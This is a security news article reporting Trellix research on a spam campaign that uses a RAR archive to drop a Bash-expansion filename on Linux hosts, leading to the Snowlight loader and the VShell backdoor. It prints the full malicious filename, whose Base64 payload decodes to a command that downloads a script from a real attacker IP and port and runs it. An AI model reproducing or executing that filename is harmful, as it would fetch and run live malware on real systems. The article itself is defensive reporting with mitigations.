Weaponized RAR Files Deliver VShell Backdoor on Linux Systems

Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts.

A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash

The braces exploit Bash’s “process expansion” syntax. Any unsanitised loop that enumerates filenames think for f in *; echo “$f” or an eval around an ls blindly evaluates the content inside the braces, echoing a Base64 blob, decoding it on the fly and piping the plaintext to bash.

No conventional executable bit or macro is necessary; a routine inventory script or log collector is enough to detonate the payload.

The decoded Stage-1 script reaches out to 47.98.194.60:8084 and silently grabs a second Bash downloader.

Persistence is achieved by expanding PATH and probing writable directories such as /tmp, /usr/local/bin and /usr/libexec.

The script fingerprint’s the host’s CPU (x86_64, i386, armv7l, aarch64) and pulls the matching ELF loader, then invokes it with nohup in the background to survive session terminations.

Each copy attempt is wrapped in redirection to /dev/null, minimising forensic artefacts on disk.

The Stage-2 ELF loader, strongly associated with the Snowlight family, constructs an HTTP GET containing the host tag, architecture identifier and listening port, then collects an XOR-enciphered binary blob.

A single-byte key (0x99) is applied in memory, after which the program executes the resulting payload via fexecve(), keeping the backdoor off disk entirely. To avoid duplicate infections, a marker file /tmp/log_de.log is checked before launch.

Finally, the process’ argv is rewritten to mimic a benign kernel worker thread [kworker/0:2] enabling it to hide in plain sight during ps or top inspections.

VShell Backdoor Capabilities

The decrypted payload is VShell, a Go-based remote-access tool favoured by several Chinese APT crews. VShell provides interactive reverse shells, file upload/download, process listing and port-forwarding.

Its HTTP C2 channel is wrapped in custom XOR routines, and its binaries are compiled for multiple architectures, making the campaign equally dangerous to cloud servers, IoT appliances and development workstations.

According to the report, The campaign bypasses three traditional detection layers at once: antivirus engines rarely scan filenames, static scanners miss the de-obfuscation chain, and behavioural tools cannot flag execution until the filename is expanded.

Because many DevOps, backup and monitoring scripts iterate through directories without sanitising input, the technique weaponises the very transparency and flexibility that make Linux attractive.

Mitigation requires strict input sanitisation (e.g., printf ‘%q’ for filenames), the removal of eval from maintenance scripts, and monitoring for anomalous outbound HTTP requests from transient binaries in /tmp or /usr/local/bin. Security teams should also hunt for fake kernel threads and unusual uses of fexecve.

Indicators of Compromise

Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!